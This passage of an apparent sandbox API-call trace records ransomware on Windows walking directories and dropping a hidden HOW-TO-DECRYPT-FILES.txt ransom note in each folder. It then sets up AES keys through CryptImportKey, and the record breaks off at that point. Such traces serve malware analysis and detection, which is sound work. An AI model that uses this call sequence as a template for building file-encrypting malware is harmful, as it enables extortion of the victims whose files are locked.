lpBuffer=0x1c21028*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.070] GetLastError () returned 0x0 [0045.070] CloseHandle (hObject=0x184) returned 1 [0045.070] GetLastError () returned 0x0 [0045.070] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.071] GetLastError () returned 0x0 [0045.071] SetFileAttributesW (lpFileName="C:\\Boot\\zh-TW\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.071] GetLastError () returned 0x0 [0045.071] GetFullPathNameW (in: lpFileName="C:\\Documents and Settings", nBufferLength=0x105, lpBuffer=0x18ead8, lpFilePart=0x0 | out: lpBuffer="C:\\Documents and Settings", lpFilePart=0x0) returned 0x19 [0045.071] GetLastError () returned 0x0 [0045.071] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.071] GetLastError () returned 0x0 [0045.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.071] GetLastError () returned 0x0 [0045.071] GetFullPathNameW (in: lpFileName="C:\\Documents and Settings", nBufferLength=0x105, lpBuffer=0x18e9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Documents and Settings", lpFilePart=0x0) returned 0x19 [0045.071] GetLastError () returned 0x0 [0045.071] SetErrorMode (uMode=0x1) returned 0x0 [0045.071] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0045.071] GetLastError () returned 0x5 [0045.073] SetErrorMode (uMode=0x0) returned 0x1 [0045.073] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x18ead8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0045.073] GetLastError () returned 0x5 [0045.073] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.073] GetLastError () returned 0x5 [0045.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.073] GetLastError () returned 0x5 [0045.073] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x18e9b0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0045.073] GetLastError () returned 0x5 [0045.073] SetErrorMode (uMode=0x1) returned 0x0 [0045.073] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.073] GetLastError () returned 0x5 [0045.073] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.074] GetLastError () returned 0x5 [0045.074] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.074] GetLastError () returned 0x5 [0045.074] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.074] GetLastError () returned 0x12 [0045.074] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.074] SetErrorMode (uMode=0x0) returned 0x1 [0045.074] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x18e9b0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0045.074] GetLastError () returned 0x12 [0045.074] SetErrorMode (uMode=0x1) returned 0x0 [0045.074] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.074] GetLastError () returned 0x12 [0045.074] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.074] GetLastError () returned 0x12 [0045.074] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.074] GetLastError () returned 0x12 [0045.074] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.074] GetLastError () returned 0x12 [0045.074] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.074] SetErrorMode (uMode=0x0) returned 0x1 [0045.074] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users", lpFilePart=0x0) returned 0x15 [0045.074] GetLastError () returned 0x12 [0045.074] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.074] GetLastError () returned 0x12 [0045.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.074] GetLastError () returned 0x12 [0045.074] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users", lpFilePart=0x0) returned 0x15 [0045.074] GetLastError () returned 0x12 [0045.074] SetErrorMode (uMode=0x1) returned 0x0 [0045.074] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.089] GetLastError () returned 0x12 [0045.089] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.096] GetLastError () returned 0x12 [0045.096] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.096] GetLastError () returned 0x12 [0045.096] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.097] SetErrorMode (uMode=0x0) returned 0x1 [0045.097] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users", lpFilePart=0x0) returned 0x15 [0045.097] GetLastError () returned 0x12 [0045.097] SetErrorMode (uMode=0x1) returned 0x0 [0045.097] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.098] GetLastError () returned 0x12 [0045.098] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.098] GetLastError () returned 0x12 [0045.098] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.098] GetLastError () returned 0x12 [0045.098] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.098] GetLastError () returned 0x12 [0045.098] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.098] GetLastError () returned 0x12 [0045.098] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.098] GetLastError () returned 0x12 [0045.098] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.098] GetLastError () returned 0x12 [0045.098] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.098] GetLastError () returned 0x12 [0045.098] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.098] GetLastError () returned 0x12 [0045.099] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.099] GetLastError () returned 0x12 [0045.099] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.099] GetLastError () returned 0x12 [0045.099] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.099] GetLastError () returned 0x12 [0045.099] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.099] GetLastError () returned 0x12 [0045.099] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.099] GetLastError () returned 0x12 [0045.099] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.099] GetLastError () returned 0x12 [0045.099] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.099] GetLastError () returned 0x12 [0045.099] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.099] GetLastError () returned 0x12 [0045.099] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.099] GetLastError () returned 0x12 [0045.099] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.099] GetLastError () returned 0x12 [0045.099] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.100] SetErrorMode (uMode=0x0) returned 0x1 [0045.100] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0045.100] GetLastError () returned 0x12 [0045.100] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.100] GetLastError () returned 0x12 [0045.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.100] GetLastError () returned 0x12 [0045.100] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0045.100] GetLastError () returned 0x12 [0045.100] SetErrorMode (uMode=0x1) returned 0x0 [0045.100] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.112] GetLastError () returned 0x12 [0045.112] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.112] GetLastError () returned 0x12 [0045.112] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.112] GetLastError () returned 0x12 [0045.112] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.112] GetLastError () returned 0x12 [0045.112] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.112] GetLastError () returned 0x12 [0045.112] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.112] GetLastError () returned 0x12 [0045.112] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.112] GetLastError () returned 0x12 [0045.112] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.112] SetErrorMode (uMode=0x0) returned 0x1 [0045.112] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0045.112] GetLastError () returned 0x12 [0045.112] SetErrorMode (uMode=0x1) returned 0x0 [0045.112] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.112] GetLastError () returned 0x12 [0045.112] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.112] GetLastError () returned 0x12 [0045.112] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.112] GetLastError () returned 0x12 [0045.112] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.112] GetLastError () returned 0x12 [0045.112] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.112] GetLastError () returned 0x12 [0045.113] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.113] GetLastError () returned 0x12 [0045.113] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.113] GetLastError () returned 0x12 [0045.113] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.113] SetErrorMode (uMode=0x0) returned 0x1 [0045.113] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0045.113] GetLastError () returned 0x12 [0045.113] SetErrorMode (uMode=0x1) returned 0x0 [0045.113] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\excellr.cab"), fInfoLevelId=0x0, lpFileInformation=0x1c291f4 | out: lpFileInformation=0x1c291f4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x13185700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x13185700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x35871b10, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x1019a53)) returned 1 [0045.113] GetLastError () returned 0x12 [0045.113] SetErrorMode (uMode=0x0) returned 0x1 [0045.113] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.113] GetLastError () returned 0x12 [0045.113] SetErrorMode (uMode=0x1) returned 0x0 [0045.113] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.115] GetLastError () returned 0x0 [0045.115] GetFileType (hFile=0x184) returned 0x1 [0045.115] SetErrorMode (uMode=0x0) returned 0x1 [0045.115] GetFileType (hFile=0x184) returned 0x1 [0045.115] WriteFile (in: hFile=0x184, lpBuffer=0x1c44db4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1c44db4*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0045.116] GetLastError () returned 0x0 [0045.116] CloseHandle (hObject=0x184) returned 1 [0045.116] GetLastError () returned 0x0 [0045.116] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.116] GetLastError () returned 0x0 [0045.116] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.116] GetLastError () returned 0x0 [0045.116] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.msi", lpFilePart=0x0) returned 0x4b [0045.116] GetLastError () returned 0x0 [0045.116] SetErrorMode (uMode=0x1) returned 0x0 [0045.116] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\excelmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x1c46ac0 | out: lpFileInformation=0x1c46ac0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20354600, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x20354600, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3584aa10, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x1b8000)) returned 1 [0045.117] GetLastError () returned 0x0 [0045.117] SetErrorMode (uMode=0x0) returned 0x1 [0045.117] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.117] GetLastError () returned 0x0 [0045.117] SetErrorMode (uMode=0x1) returned 0x0 [0045.117] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.117] GetLastError () returned 0x5 [0045.118] SetErrorMode (uMode=0x0) returned 0x1 [0045.118] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0045.118] GetLastError () returned 0x5 [0045.118] SetErrorMode (uMode=0x1) returned 0x0 [0045.118] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c648ac | out: lpFileInformation=0x1c648ac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3584aa10, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x61d)) returned 1 [0045.118] GetLastError () returned 0x5 [0045.118] SetErrorMode (uMode=0x0) returned 0x1 [0045.118] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0045.118] GetLastError () returned 0x5 [0045.118] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0045.118] GetLastError () returned 0x5 [0045.118] SetErrorMode (uMode=0x1) returned 0x0 [0045.118] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.119] GetLastError () returned 0x0 [0045.119] GetFileType (hFile=0x184) returned 0x1 [0045.119] SetErrorMode (uMode=0x0) returned 0x1 [0045.119] GetFileType (hFile=0x184) returned 0x1 [0045.119] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x61d [0045.119] GetLastError () returned 0x0 [0045.119] ReadFile (in: hFile=0x184, lpBuffer=0x1c66f84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c66f84*, lpNumberOfBytesRead=0x18ed84*=0x61d, lpOverlapped=0x0) returned 1 [0045.129] GetLastError () returned 0x0 [0045.129] CloseHandle (hObject=0x184) returned 1 [0045.129] GetLastError () returned 0x0 [0045.129] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0045.129] GetLastError () returned 0x0 [0045.129] SetErrorMode (uMode=0x1) returned 0x0 [0045.129] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3584aa10, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x61d)) returned 1 [0045.129] GetLastError () returned 0x0 [0045.129] SetErrorMode (uMode=0x0) returned 0x1 [0045.129] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0045.130] GetLastError () returned 0x0 [0045.162] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1cc2984, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ae0) returned 1 [0045.162] GetLastError () returned 0x0 [0045.162] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.162] GetLastError () returned 0x0 [0045.167] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.167] GetLastError () returned 0x0 [0045.167] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b20) returned 1 [0045.167] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.167] GetLastError () returned 0x0 [0045.167] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1cef9d0*=0x1, dwFlags=0x0) returned 1 [0045.167] GetLastError () returned 0x0 [0045.167] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1cef99c, dwFlags=0x0) returned 1 